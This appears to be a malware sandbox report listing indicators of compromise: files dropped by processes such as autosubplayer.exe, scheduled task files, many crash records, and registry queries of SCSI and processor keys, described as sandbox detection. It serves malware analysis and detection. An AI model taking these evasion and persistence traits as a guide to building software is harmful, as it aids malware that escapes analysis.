File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-0IFB8.tmp	vpn.tmp
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html	autosubplayer.exe
File opened for modification	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d	jg1_1faf.exe
File created	C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe	DYbALA.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	autosubplayer.exe
File created	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\MaskVPN\is-5CEO9.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll	autosubplayer.exe
File created	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-MBG7O.tmp	vpn.tmp
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	autosubplayer.exe

Drops file in Windows directory 58 IoCs

Processes:

msiexec.exeDrvInst.exemsiexec.exeDrvInst.exetapinstall.exeMsiExec.exeWerFault.exesvchost.exesvchost.exerundll32.exe

description	ioc	process
File created	C:\Windows\Installer\fb6bb65.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSID85.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC009.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEFCD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF6CB.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8C1.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF71FB6C359B7FE8BB.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBBE2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC1B0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC81B.tmp	msiexec.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\Installer\MSIE2C9.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFB6C0E94BF782EC74.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF55854300FD50CEC6.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFF3A.tmp	msiexec.exe
File created	C:\Windows\Installer\f787f73.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE701.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEBC5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1C0F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC9B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB6E0.tmp	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File opened for modification	C:\Windows\Installer\MSIFBFC.tmp	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Installer\f787f73.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DFE32DBCA61EA57E7A.TMP	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEBFC.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF7B23878A435BD970.TMP	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4CE.tmp	msiexec.exe
File opened for modification	C:\Windows\Tasks\SA.DAT	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\Installer\MSI620.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1594.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\fb6bb65.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI96F3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE0A5.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2A.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF4CD235BD5E79E7CE.TMP	msiexec.exe
File created	C:\Windows\Tasks\IuWtIecd.job	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIE3F3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1F3D.tmp	msiexec.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIF062.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI177A.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF9D4F20C5F930BD23.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4740.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFBB32E4917BB74D07.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 44 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6264	1240	WerFault.exe	rundll32.exe
6800	4040	WerFault.exe	Mon17870faab0.exe
6892	1240	WerFault.exe	rundll32.exe
6676	5544	WerFault.exe	chrome.exe
7000	5796	WerFault.exe	FMTnjSf044j05Xl8dMd_dNnh.exe
7044	1460	WerFault.exe	Mon17a0d8ec302e.exe
3576	6372	WerFault.exe	chrome3.exe
1092	4856	WerFault.exe	rundll32.exe
6932	5592	WerFault.exe	AHF75qBjiaQYz2D8BbekPx7V.exe
5812	5148	WerFault.exe	Soft1WW01.exe
4376	6032	WerFault.exe	JmrC_y7ZqnosVrDZc7UTR80C.exe
4452	3412	WerFault.exe	JmrC_y7ZqnosVrDZc7UTR80C.exe
1104	5708	WerFault.exe	setup.exe
1240	5788	WerFault.exe	f_qhca_mqGIJHx39G3hKWVKQ.exe
6208	1816	WerFault.exe	0fFanJEm3W2BLsRLXOPRYqYY.exe
5052	5592	WerFault.exe	ABB3.exe
3708	4680	WerFault.exe	neCuj2trzULeCoH07fFT9rBD.exe
132	5656	WerFault.exe	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
3984	6552	WerFault.exe	XOi6C0Ymdh5PqNsTC3JWe2Yq.exe
5608	2664	WerFault.exe	XkYUSm_BYC_RZqlw0pSLKPVp.exe
5168	1180	WerFault.exe	rundll32.exe
3040	2440	WerFault.exe	16A5.exe
5244	7084	WerFault.exe	2DA8.exe
3024	5768	WerFault.exe	UlBX2Ub5Zbv6MawSefADY4uU.exe
1320	5968	WerFault.exe	beadroll.exe
5600	236	WerFault.exe	rundll32.exe
2372	6192	WerFault.exe	71F8.exe
6484	5012	WerFault.exe	UlBX2Ub5Zbv6MawSefADY4uU.exe
500	6964	WerFault.exe	FFEF.exe
3580	4048	WerFault.exe	5D56.exe
7200	6152	WerFault.exe	rundll32.exe
7336	10092	WerFault.exe	GcleanerEU.exe
7528	6264	WerFault.exe	gcleaner.exe
9372	6488	WerFault.exe	tkools.exe
6764	5532	WerFault.exe	GcleanerEU.exe
5840	10180	WerFault.exe	rundll32.exe
10032	8384	WerFault.exe	gcleaner.exe
6628	5492	WerFault.exe	autosubplayer.exe
6148	6456	WerFault.exe	GcleanerEU.exe
4868	8220	WerFault.exe	rundll32.exe
10160	9096	WerFault.exe	gcleaner.exe
8432	4896	WerFault.exe	GcleanerEU.exe
1968	7116	WerFault.exe	rundll32.exe
2084	6272	WerFault.exe	gcleaner.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

svchost.exesvchost.exeDrvInst.exetapinstall.exeDrvInst.exe6F64.exeyOj1WECF7HJNMLcwMO9spdy6.exetapinstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6F64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	yOj1WECF7HJNMLcwMO9spdy6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6F64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exePOWERPNT.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeany.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execonfigbdzhzl.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
